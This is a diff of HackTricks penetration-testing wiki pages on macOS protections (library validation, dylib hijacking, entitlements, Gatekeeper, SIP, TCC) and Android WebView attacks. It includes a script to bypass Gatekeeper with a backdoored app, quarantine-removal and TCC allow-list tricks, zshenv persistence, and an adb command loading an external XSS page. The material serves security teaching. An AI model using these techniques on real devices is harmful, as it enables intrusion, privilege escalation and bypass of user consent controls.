-You can check if a binary has **hardenend runtime** with `codesign --display --verbose <bin>` checking the flag runtime in **`CodeDirectory`** like: **`CodeDirectory v=20500 size=767 flags=0x10000(runtime) hashes=13+7 location=embedded`**
+### Library Validation
+
+Even if the binary allows to use the **`DYLD_INSERT_LIBRARIES`** env variable, if the binary checks the signature of the library to load it won't load a custom what.
+
+In order to load a custom library, the binary needs to have **one of the following entitlements**:
+
+* &#x20;[`com.apple.security.cs.disable-library-validation`](../../macos-security-protections/macos-dangerous-entitlements.md#com.apple.security.cs.disable-library-validation)
+* [`com.apple.private.security.clear-library-validation`](../../macos-security-protections/macos-dangerous-entitlements.md#com.apple.private.security.clear-library-validation)
+
+or the binary **shouldn't** have the **hardened runtime flag** or the **library validation flag**.
+
+You can check if a binary has **hardened runtime** with `codesign --display --verbose <bin>` checking the flag runtime in **`CodeDirectory`** like: **`CodeDirectory v=20500 size=767 flags=0x10000(runtime) hashes=13+7 location=embedded`**
+
+You can also load a library if it's **signed with the same certificate as the binary**.
 
 Find a example on how to (ab)use this and check the restrictions in:
 
@@ -53,7 +63,7 @@ Find a example on how to (ab)use this and check the restrictions in:
 ## Dylib Hijacking
 
 {% hint style="danger" %}
-Remember that **previous restrictions also apply** to perform Dylib hijacking attacks.
+Remember that **previous Library Validation restrictions also apply** to perform Dylib hijacking attacks.
 {% endhint %}
 
 As in Windows, in MacOS you can also **hijack dylibs** to make **applications** **execute** **arbitrary** **code**.\
@@ -75,7 +85,7 @@ However, there are **2 types of dylib hijacking**:
 * **Missing weak linked libraries**: This means that the application will try to load a library that doesn't exist configured with **LC\_LOAD\_WEAK\_DYLIB**. Then, **if an attacker places a dylib where it's expected it will be loaded**.
   * The fact that the link is "weak" means that the application will continue running even if the library isn't found.
   * The **code related** to this is in the function `ImageLoaderMachO::doGetDependentLibraries` of `ImageLoaderMachO.cpp` where `lib->required` is only `false` when `LC_LOAD_WEAK_DYLIB` is true.
-  * **Find weak liked libraries** in binaries with (you have later an example on how to create hijacking libraries):
+  * **Find weak linked libraries** in binaries with (you have later an example on how to create hijacking libraries):
     * ```bash
       otool -l </path/to/bin> | grep LC_LOAD_WEAK_DYLIB -A 5 cmd LC_LOAD_WEAK_DYLIB
       cmdsize 56
@@ -114,6 +124,10 @@ A nice **report with technical details** about this technique can be found [**he
 
 ## Dlopen Hijacking
 
+{% hint style="danger" %}
+Remember that **previous Library Validation restrictions also apply** to perform Dlopen hijacking attacks.
+{% endhint %}
+
 From **`man dlopen`**:
 
 * When path **does not contain a slash character** (i.e. it is just a leaf name), **dlopen() will do searching**. If **`$DYLD_LIBRARY_PATH`** was set at launch, dyld will first **look in that director**y. Next, if the calling mach-o file or the main executable specify an **`LC_RPATH`**, then dyld will **look in those** directories. Next, if the process is **unrestricted**, dyld will search in the **current working directory**. Lastly, for old binaries, dyld will try some fallbacks. If **`$DYLD_FALLBACK_LIBRARY_PATH`** was set at launch, dyld will search in **those directories**, otherwise, dyld will look in **`/usr/local/lib/`** (if the process is unrestricted), and then in **`/usr/lib/`** (this info was taken from **`man dlopen`**).

macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md

@@ -46,7 +46,7 @@ MacOS Sandbox **limits applications** running inside the sandbox to the **allowe
 [macos-tcc](macos-tcc/)
 {% endcontent-ref %}
 
-### Launch Constraints
+### Launch/Environment Constraints & Trust Cache
 
 Launch constraints in macOS are a security feature to **regulate process initiation** by defining **who can launch** a process, **how**, and **from where**. Introduced in macOS Ventura, they categorize system binaries into constraint categories within a **trust cache**. Every executable binary has set **rules** for its **launch**, including **self**, **parent**, and **responsible** constraints. Extended to third-party apps as **Environment** Constraints in macOS Sonoma, these features help mitigate potential system exploitations by governing process launching conditions.
 

macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-dangerous-entitlements.md

@@ -42,6 +42,11 @@ Apps with the Debugging Tool Entitlement can call `task_for_pid()` to retrieve a
 
 This entitlement allows to **load frameworks, plug-ins, or libraries without being either signed by Apple or signed with the same Team ID** as the main executable, so an attacker could abuse some arbitrary library load to inject code. Check [**this for more info**](https://developer.apple.com/documentation/bundleresources/entitlements/com\_apple\_security\_cs\_disable-library-validation).
 
+### `com.apple.private.security.clear-library-validation`
+
+This entitlement is very similar to **`com.apple.security.cs.disable-library-validation`** but **instead** of **directly disabling** library validation, it allows the process to **call a `csops` system call to disable it**.\
+Check [**this for more info**](https://theevilbit.github.io/posts/com.apple.private.security.clear-library-validation/).
+
 ### `com.apple.security.cs.allow-dyld-environment-variables`
 
 This entitlement allows to **use DYLD environment variables** that could be used to inject libraries and code. Check [**this for more info**](https://developer.apple.com/documentation/bundleresources/entitlements/com\_apple\_security\_cs\_allow-dyld-environment-variables).
@@ -50,6 +55,14 @@ This entitlement allows to **use DYLD environment variables** that could be used
 
 [**According to this blog**](https://objective-see.org/blog/blog\_0x4C.html), these entitlements allows to **modify** the **TCC** database.
 
+### **`system.install.apple-software`** and **`system.install.apple-software.standar-user`**
+
+These entitlements allows to **install software without asking for permissions** to the user, which can be helpful for a **privilege escalation**.
+
+### `com.apple.private.security.kext-management`
+
+Entitlement needed to ask the **kernel to load a kernel extension**.
+
 ### `com.apple.private.tcc.manager.check-by-audit-token`
 
 TODO: I don't know what this allows to do
@@ -62,6 +75,21 @@ TODO: In [**this report**](https://jhftss.github.io/The-Nightmare-of-Apple-OTA-U
 
 TODO: In [**this report**](https://jhftss.github.io/The-Nightmare-of-Apple-OTA-Update/) **is mentioned that this could be used to** update the SSV-protected contents after a reboot. If you know how it send a PR please!
 
+### `keychain-access-groups`
+
+This entitlement list **keychain** groups the application has access to:
+
+```xml
+<key>keychain-access-groups</key>
+<array>
+        <string>ichat</string>
+        <string>apple</string>
+        <string>appleaccount</string>
+        <string>InternetAccounts</string>
+        <string>IMCore</string>
+</array>
+```
+
 ### **`kTCCServiceSystemPolicyAllFiles`**
 
 Gives **Full Disk Access** permissions, one of the TCC highest permissions you can have.
@@ -76,7 +104,9 @@ Allows to **change** the **`NFSHomeDirectory`** attribute of a user that changes
 
 ### **`kTCCServiceSystemPolicyAppBundles`**
 
-Allow to modify apps inside their folders (inside app.app), which is disallowed by default.
+Allow to modify files inside apps bundle (inside app.app), which is **disallowed by default**.
+
+<figure><img src="../../../.gitbook/assets/image (2).png" alt=""><figcaption></figcaption></figure>
 
 ## Medium
 

macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md

@@ -50,6 +50,12 @@ For example: [https://youtu.be/f1HA5QhLQ7Y?t=21098](https://youtu.be/f1HA5QhLQ7Y
 
 ## Avoid quarantine xattrs tricks
 
+### Remove it
+
+```bash
+xattr -d com.apple.quarantine /path/to/file_or_app
+```
+
 ### uchg / uchange / uimmutable flag
 
 If a file/folder has this immutable attribute it won't be possible to put an xattr on it
@@ -138,6 +144,64 @@ Not really needed but I leave it there just in case:
 [macos-xattr-acls-extra-stuff.md](macos-xattr-acls-extra-stuff.md)
 {% endcontent-ref %}
 
+## Bypass Code Signatures
+
+Bundles contains the file **`_CodeSignature/CodeResources`** which contains the **hash** of every single **file** in the **bundle**. Note that the hash of CodeResources is also **embedded in the executable**, so we can't mess with that, either.
+
+However, there are some files whose signature won't be checked, these have the key omit in the plist, like:
+
+```xml
+<dict>
+...
+	<key>rules</key>
+	<dict>
+...
+		<key>^Resources/.*\.lproj/locversion.plist$</key>
+		<dict>
+			<key>omit</key>
+			<true/>
+			<key>weight</key>
+			<real>1100</real>
+		</dict>
+...
+	</dict>
+	<key>rules2</key>
+...
+		<key>^(.*/)?\.DS_Store$</key>
+		<dict>
+			<key>omit</key>
+			<true/>
+			<key>weight</key>
+			<real>2000</real>
+		</dict>
+...
+		<key>^PkgInfo$</key>
+		<dict>
+			<key>omit</key>
+			<true/>
+			<key>weight</key>
+			<real>20</real>
+		</dict>
+...
+		<key>^Resources/.*\.lproj/locversion.plist$</key>
+		<dict>
+			<key>omit</key>
+			<true/>
+			<key>weight</key>
+			<real>1100</real>
+		</dict>
+...
+</dict>
+```
+
+It's possible to claculate the signature of a resource from the cli with:
+
+{% code overflow="wrap" %}
+```bash
+openssl dgst -binary -sha1 /System/Cryptexes/App/System/Applications/Safari.app/Contents/Resources/AppIcon.icns | openssl base64
+```
+{% endcode %}
+
 ## Mount dmgs
 
 A user can mount a custom dmg created even on top of some existing folders. This is how you could create a custom dmg package with custom content:
@@ -159,6 +223,9 @@ echo "hello" > /private/tmp/mnt/custom_folder/custom_file
 hdiutil detach /private/tmp/mnt 1>/dev/null
 
 # Next time you mount it, it will have the custom content you wrote
+
+# You can also create a dmg from an app using:
+hdiutil create -srcfolder justsome.app justsome.dmg 
 ```
 {% endcode %}
 

macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md

@@ -323,6 +323,41 @@ Check the [**original report**](https://www.microsoft.com/en-us/security/blog/20
 
 It was discovered that **Google Chrome wasn't setting the quarantine attribute** to downloaded files because of some macOS internal problems.
 
+### [CVE-2023-27951](https://redcanary.com/blog/gatekeeper-bypass-vulnerabilities/)
+
+AppleDouble file formats store the attributes of a file in a separate file starting by `._`, this helps to copy dile attributes **across macOS machines**. However, it was noticed that after decompressing an AppleDouble file, the file starting with `._` **wasn't given the quarantine attribute**.
+
+{% code overflow="wrap" %}
+```bash
+mkdir test
+echo a > test/a
+echo b > test/b
+echo ._a > test/._a
+aa archive -d test/ -o test.aar
+
+# If you downloaded the resulting test.aar and decompress it, the file test/._a won't have a quarantitne attribute
+```
+{% endcode %}
+
+Being able to create a file that won't have the quarantine attribute set, it was **possible to bypass Gatekeeper.** The trick was to **create a DMG file application** using the AppleDouble name convention (start it with `._`) and create a **visible file as a sym link to this hidden** file without the quarantine attribute.\
+When the **dmg file is executed**, as it doesn't have a quarantine attribute it'll **bypass Gatekeeper**.
+
+```bash
+# Create an app bundle with the backdoor an call it app.app
+
+echo "[+] creating disk image with app"
+hdiutil create -srcfolder app.app app.dmg
+
+echo "[+] creating directory and files"
+mkdir 
+mkdir -p s/app
+cp app.dmg s/app/._app.dmg
+ln -s ._app.dmg s/app/app.dmg
+
+echo "[+] compressing files"
+aa archive -d s/ -o app.aar
+```
+
 <details>
 
 <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-launch-environment-constraints.md

@@ -29,7 +29,7 @@ There are 4 types of constraints:
 * **Responsible Constraints**: Constraints applied to the **process calling the service** in a XPC communication
 * **Library load constraints**: Use library load constraints to selectively describe code that can be loaded
 
-So when a process tries to launch another process — by calling `execve(_:_:_:)` or `posix_spawn(_:_:_:_:_:_:)` — the operating system checks that the **executable** file **satisfies** its **own self constraint**. It also checks that the **parent** **process’s** executable **satisfies** the executable’s **parent constraint**, and that the **responsible** **process’s** executable **satsifies the executable’s responsible process constrain**t. If any of these launch constraints aren’t satisfied, the operating system doesn’t run the program.
+So when a process tries to launch another process — by calling `execve(_:_:_:)` or `posix_spawn(_:_:_:_:_:_:)` — the operating system checks that the **executable** file **satisfies** its **own self constraint**. It also checks that the **parent** **process’s** executable **satisfies** the executable’s **parent constraint**, and that the **responsible** **process’s** executable **satisfies the executable’s responsible process constrain**t. If any of these launch constraints aren’t satisfied, the operating system doesn’t run the program.
 
 If when loading a library any part of the **library constraint isn’t true**, your process **doesn’t load** the library.
 

macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-default-sandbox-debug.md

@@ -76,6 +76,8 @@ EOF
 
 3. Define the entitlements
 
+{% tabs %}
+{% tab title="sandbox" %}
 ```bash
 cat << EOF > entitlements.plist
 <?xml version="1.0" encoding="UTF-8"?>
@@ -88,6 +90,25 @@ cat << EOF > entitlements.plist
 </plist>
 EOF
 ```
+{% endtab %}
+
+{% tab title="sandbox + downloads" %}
+```bash
+cat << EOF > entitlements.plist
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+<plist version="1.0">
+<dict>
+    <key>com.apple.security.app-sandbox</key>
+    <true/>
+    <key>com.apple.security.files.downloads.read-write</key>
+    <true/>
+</dict>
+</plist>
+EOF
+```
+{% endtab %}
+{% endtabs %}
 
 4. Sign the app (you need to create a certificate in the keychain)
 

macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip.md

@@ -101,9 +101,11 @@ One potential loophole is that if a file is specified in **`rootless.conf` but d
 The entitlement **`com.apple.rootless.install.heritable`** allows to bypass SIP
 {% endhint %}
 
-[**Researchers from this blog post**](https://www.microsoft.com/en-us/security/blog/2021/10/28/microsoft-finds-new-macos-vulnerability-shrootless-that-could-bypass-system-integrity-protection/) discovered a vulnerability in macOS's System Integrity Protection (SIP) mechanism, dubbed the 'Shrootless' vulnerability. This vulnerability centers around the `system_installd` daemon, which has an entitlement, **`com.apple.rootless.install.heritable`**, that allows any of its child processes to bypass SIP's file system restrictions.
+[**Researchers from this blog post**](https://www.microsoft.com/en-us/security/blog/2021/10/28/microsoft-finds-new-macos-vulnerability-shrootless-that-could-bypass-system-integrity-protection/) discovered a vulnerability in macOS's System Integrity Protection (SIP) mechanism, dubbed the 'Shrootless' vulnerability. This vulnerability centers around the **`system_installd`** daemon, which has an entitlement, **`com.apple.rootless.install.heritable`**, that allows any of its child processes to bypass SIP's file system restrictions.
 
-Researchers found that during the installation of an Apple-signed package (.pkg file), **`system_installd`** **runs** any **post-install** scripts included in the package. These scripts are executed by the default shell, **`zsh`**, which automatically **runs** commands from the **`/etc/zshenv`** file, if it exists, even in non-interactive mode. This behavior could be exploited by attackers: by creating a malicious `/etc/zshenv` file and waiting for `system_installd` to invoke `zsh`, they could perform arbitrary operations on the device.
+**`system_installd`** daemon will install packages that have been signed by **Apple**.
+
+Researchers found that during the installation of an Apple-signed package (.pkg file), **`system_installd`** **runs** any **post-install** scripts included in the package. These scripts are executed by the default shell, **`zsh`**, which automatically **runs** commands from the **`/etc/zshenv`** file, if it exists, even in non-interactive mode. This behavior could be exploited by attackers: by creating a malicious `/etc/zshenv` file and waiting for **`system_installd` to invoke `zsh`**, they could perform arbitrary operations on the device.
 
 Moreover, it was discovered that **`/etc/zshenv` could be used as a general attack technique**, not just for a SIP bypass. Each user profile has a `~/.zshenv` file, which behaves the same way as `/etc/zshenv` but doesn't require root permissions. This file could be used as a persistence mechanism, triggering every time `zsh` starts, or as an elevation of privilege mechanism. If an admin user elevates to root using `sudo -s` or `sudo <command>`, the `~/.zshenv` file would be triggered, effectively elevating to root.
 

macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/README.md

@@ -141,6 +141,43 @@ Obtaining **write permissions** over the **user TCC** database you **can'**t gra
 
 But you can **can** give yourself **`Automation rights to Finder`, and since `Finder` has `FDA`, so do you.**
 
+### **From SIP Bypass to TCC Bypass**
+
+The **TCC databases** are protected by **SIP**, thats why only processes with the **indicated entitlements  are going to be able to modify** the databases. Therefore, if an attacker finds a **SIP bypass** over a **file** (be able to modify a file restricted by SIP), he will be able **remove the protection** of a TCC database, and give himself all TCC permissions.
+
+However, there is another option to abuse this **SIP bypass to bypass TCC**, the file `/Library/Apple/Library/Bundles/TCC_Compatibility.bundle/Contents/Resources/AllowApplicationsList.plist` is an allow list of applications that require a TCC exception. Therefore, if an attacker can **remove the SIP protection** from this file and add his **own application** the application ill be able to bypass TCC.\
+For example to add terminal:
+
+```bash
+# Get needed info
+codesign -d -r- /System/Applications/Utilities/Terminal.app
+```
+
+AllowApplicationsList.plist:
+
+```xml
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+<plist version="1.0">
+<dict>
+	<key>Services</key>
+	<dict>
+		<key>SystemPolicyAllFiles</key>
+		<array>
+			<dict>
+				<key>CodeRequirement</key>
+				<string>identifier &quot;com.apple.Terminal&quot; and anchor apple</string>
+				<key>IdentifierType</key>
+				<string>bundleID</string>
+				<key>Identifier</key>
+				<string>com.apple.Terminal</string>
+			</dict>
+		</array>
+	</dict>
+</dict>
+</plist>
+```
+
 ### TCC Signature Checks
 
 The TCC **database** stores the **Bundle ID** of the application, but it also **stores** **information** about the **signature** to **make sure** the App asking to use the a permission is the correct one.

macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md

@@ -317,7 +317,7 @@ Telegram had the entitlements `com.apple.security.cs.allow-dyld-environment-vari
 
 ## By open invocations
 
-It's possible to invoke open in sandboxed 
+It's possible to invoke `open` even while sandboxed 
 
 ### Terminal Scripts
 
@@ -437,6 +437,16 @@ In several occasions files will store sensitive information like emails, phone n
 
 <figure><img src="../../../../../.gitbook/assets/image (4) (3).png" alt=""><figcaption></figcaption></figure>
 
+## Synthetic Clicks
+
+This doesn't work anymore, but it [**did in the past**](https://twitter.com/noarfromspace/status/639125916233416704/photo/1)**:**
+
+<figure><img src="../../../../../.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
+
+Another way using [**CoreGraphics events**](https://objectivebythesea.org/v2/talks/OBTS\_v2\_Wardle.pdf):
+
+<figure><img src="../../../../../.gitbook/assets/image (1).png" alt="" width="563"><figcaption></figcaption></figure>
+
 ## Reference
 
 * [**https://medium.com/@mattshockl/cve-2020-9934-bypassing-the-os-x-transparency-consent-and-control-tcc-framework-for-4e14806f1de8**](https://medium.com/@mattshockl/cve-2020-9934-bypassing-the-os-x-transparency-consent-and-control-tcc-framework-for-4e14806f1de8)

mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.md

@@ -12,7 +12,7 @@
 
 </details>
 
-<figure><img src="../../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
@@ -149,7 +149,7 @@ You can see that in [the next tutorial](frida-tutorial-2.md).
 
 
 
-<figure><img src="../../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 

mobile-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.md

@@ -20,7 +20,7 @@
 
 \\
 
-
+***
 
 **From**: [https://joshspicer.com/android-frida-1](https://joshspicer.com/android-frida-1)\
 **APK**: [https://github.com/OWASP/owasp-mstg/blob/master/Crackmes/Android/Level\_01/UnCrackable-Level1.apk](https://github.com/OWASP/owasp-mstg/blob/master/Crackmes/Android/Level\_01/UnCrackable-Level1.apk)

mobile-pentesting/android-app-pentesting/install-burp-certificate.md

@@ -52,15 +52,15 @@ Explained in [**this video**](https://www.youtube.com/watch?v=qQicUW0svB8) you n
 
 1. **Install a CA certificate**: Just **drag\&drop** the DER Burp certificate **changing the extension** to `.crt` in the mobile so it's stored in the Downloads folder and go to `Install a certificate` -> `CA certificate`
 
-<figure><img src="../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1).png" alt="" width="164"><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" width="164"><figcaption></figcaption></figure>
 
 * Check that the certificate was correctly stored going to `Trusted credentials` -> `USER`
 
-<figure><img src="../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" width="334"><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" width="334"><figcaption></figcaption></figure>
 
 2. **Make it System trusted**: Download the Magisc module [MagiskTrustUserCerts](https://github.com/NVISOsecurity/MagiskTrustUserCerts) (a .zip file), **drag\&drop it** in the phone, go to the **Magics app** in the phone to the **`Modules`** section, click on **`Install from storage`**, select the `.zip` module and once installed **reboot** the phone:
 
-<figure><img src="../../.gitbook/assets/image (2) (1) (1) (1) (1) (1).png" alt="" width="345"><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1).png" alt="" width="345"><figcaption></figcaption></figure>
 
 * After rebooting, go to `Trusted credentials` -> `SYSTEM` and check the Postswigger cert is there
 

mobile-pentesting/android-app-pentesting/webview-attacks.md

@@ -1,31 +1,30 @@
-
+# Webview Attacks
 
 <details>
 
 <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
 
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-
-- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
 
 </details>
 
+## Interesting Configurations
 
-# Interesting Configurations
+You can identify an exposed WebView like this:
 
-## File Access
+<figure><img src="../../.gitbook/assets/image (718).png" alt=""><figcaption></figcaption></figure>
+
+### File Access
 
 _WebView_ file access is enabled by default. Since API 3 (Cupcake 1.5) the method [_setAllowFileAccess()_](https://developer.android.com/reference/android/webkit/WebSettings.html#setAllowFileAccess\(boolean\)) is available for explicitly enabling or disabling it.\
-If the application has _**android.permission.READ\_EXTERNAL\_STORAGE** _ it will be able to read and load files **from the external storage**.\
+If the application has \_**android.permission.READ\_EXTERNAL\_STORAGE** \_ it will be able to read and load files **from the external storage**.\
 The _WebView_ needs to use a File URL Scheme, e.g., `file://path/file`, to access the file.
 
-### Universal Access From File URL (Deprecated)
+#### Universal Access From File URL (Deprecated)
 
 > Sets whether **cross-origin requests** in the **context of a file** scheme URL should be allowed to access **content from any origin**. This includes **access to content from other file scheme URLs or web contexts.** Note that some access such as image HTML elements doesn't follow same-origin rules and isn't affected by this setting.
 >
@@ -41,20 +40,20 @@ The **default value is `false`** when targeting [`Build.VERSION_CODES.JELLY_BEAN
 Using **`loadDataWithBaseURL()`** with `null` as baseURL will also **prevent to load local files** even if all the dangerous settings are enabled.
 {% endhint %}
 
-### File Access From File URLs (Deprecated) <a href="#getallowfileaccessfromfileurls" id="getallowfileaccessfromfileurls"></a>
+#### File Access From File URLs (Deprecated) <a href="#getallowfileaccessfromfileurls" id="getallowfileaccessfromfileurls"></a>
 
 > Sets whether cross-origin requests in the context of a file scheme URL should be allowed to access content from other file scheme URLs. Note that some accesses such as image HTML elements don't follow same-origin rules and aren't affected by this setting.
 >
 > **Don't** enable this setting if you open files that may be created or altered by external sources. Enabling this setting allows malicious scripts loaded in a `file://` context to access arbitrary local files including WebView cookies and app private data.
 
 In summary, this prevents javascript to access local files via `file://` protocol.\
-Note that **the value of this setting is ignored** if the value of [`getAllowUniversalAccessFromFileURLs()`](https://developer.android.com/reference/android/webkit/WebSettings#getAllowUniversalAccessFromFileURLs\(\)) is `true`. \
+Note that **the value of this setting is ignored** if the value of [`getAllowUniversalAccessFromFileURLs()`](https://developer.android.com/reference/android/webkit/WebSettings#getAllowUniversalAccessFromFileURLs\(\)) is `true`.\
 The **default value is `false`** when targeting [`Build.VERSION_CODES.JELLY_BEAN`](https://developer.android.com/reference/android/os/Build.VERSION\_CODES#JELLY\_BEAN) and above.
 
 * Use [`getAllowFileAccessFromFileURLs()`](https://developer.android.com/reference/android/webkit/WebSettings#getAllowFileAccessFromFileURLs\(\)) to know whether JavaScript is running in the context of a file scheme URL can access content from other file scheme URLs.
 * Use [`setAllowFileAccessFromFileURLs(boolen)`](https://developer.android.com/reference/android/webkit/WebSettings#setAllowFileAccessFromFileURLs\(boolean\))to enable/disable it.
 
-### File Access
+#### File Access
 
 > Enables or disables **file access within WebView**. Note that this enables or disables file system access only. Assets and resources are still accessible using file:///android\_asset and file:///android\_res.
 
@@ -64,18 +63,30 @@ The **default value is`false`** when targeting [`Build.VERSION_CODES.R`](https:/
 * Use [`getAllowFileAccess()`](https://developer.android.com/reference/android/webkit/WebSettings#getAllowFileAccess\(\)) to know if the configuration is enabled.
 * Use [`setAllowFileAccess(boolean)`](https://developer.android.com/reference/android/webkit/WebSettings#setAllowFileAccess\(boolean\)) to enable/disable it.
 
-### WebViewAssetLoader
+#### WebViewAssetLoader
 
 > Helper class to load local files including application's static assets and resources using http(s):// URLs inside a [`WebView`](https://developer.android.com/reference/android/webkit/WebView.html) class. Loading local files using web-like URLs instead of `"file://"` is desirable as it is compatible with the Same-Origin policy.
 
 This is new recommended way to load local files. The goal is to **access local files using a HTTP URL with the domain**. This way the **CORS** can be **easily** maintained between the **local** web **pages** and the **web** **pages** that are downloaded from the web server.
 
-## Javascript Enabled
+### Javascript Enabled
 
-WebViews have Javascript **disabled by default**. The method [`setJavaScriptEnabled()`](https://developer.android.com/reference/android/webkit/WebSettings.html#setJavaScriptEnabled\(boolean\)) is can explicitly enabling or disabling it. \
+WebViews have Javascript **disabled by default**. The method [`setJavaScriptEnabled()`](https://developer.android.com/reference/android/webkit/WebSettings.html#setJavaScriptEnabled\(boolean\)) is can explicitly enabling or disabling it.\
 Note that webviews can also support the **`intent`** **scheme** that allows to fire other applications. Read this [writeup to find how to go from XSS to RCE](https://medium.com/@dPhoeniixx/tiktok-for-android-1-click-rce-240266e78105).
 
-## Javascript Bridge
+here is an example of an exposed webview vulnerable to XSS via the parameter "support\_url" (which can indicate the URL to load in the webviwe):
+
+<figure><img src="../../.gitbook/assets/image (719).png" alt="" width="563"><figcaption></figcaption></figure>
+
+It's possible to exploit that vuln from adb with something like:
+
+{% code overflow="wrap" %}
+```bash
+adb.exe shell am start -n com.tmh.vulnwebview/.SupportWebView –es support_url "https://6333-157-48-216-175.ngrok-free.app/xss.html"
+```
+{% endcode %}
+
+### Javascript Bridge
 
 Android offers a way for JavaScript executed in a WebView to call and use **native functions of an Android app** (annotated with `@JavascriptInterface`) by using the [`addJavascriptInterface`](https://developer.android.com/reference/android/webkit/WebView.html#addJavascriptInterface%28java.lang.Object,%20java.lang.String%29) method. This is known as a _WebView JavaScript bridge_ or _native bridge_.
 
@@ -83,7 +94,7 @@ Please note that **when you use `addJavascriptInterface`, you're explicitly gran
 
 > Warning: Take extreme care with apps targeting Android versions below Android 4.2 (API level 17) as they are [vulnerable to a flaw](https://labs.mwrinfosecurity.com/blog/webview-addjavascriptinterface-remote-code-execution/) in the implementation of `addJavascriptInterface`: an attack that is abusing reflection, which leads to remote code execution when malicious JavaScript is injected into a WebView. This was due to all Java Object methods being accessible by default (instead of only those annotated).
 
-### Static Analysis
+#### Static Analysis
 
 ```javascript
 //Class with a method to access a secret
@@ -120,7 +131,7 @@ If `addJavascriptInterface` is necessary, take the following considerations:
 * **No JavaScript should be loaded from remote endpoint**s, e.g. by keeping page navigation within the app's domains and opening all other domains on the default browser (e.g. Chrome, Firefox).
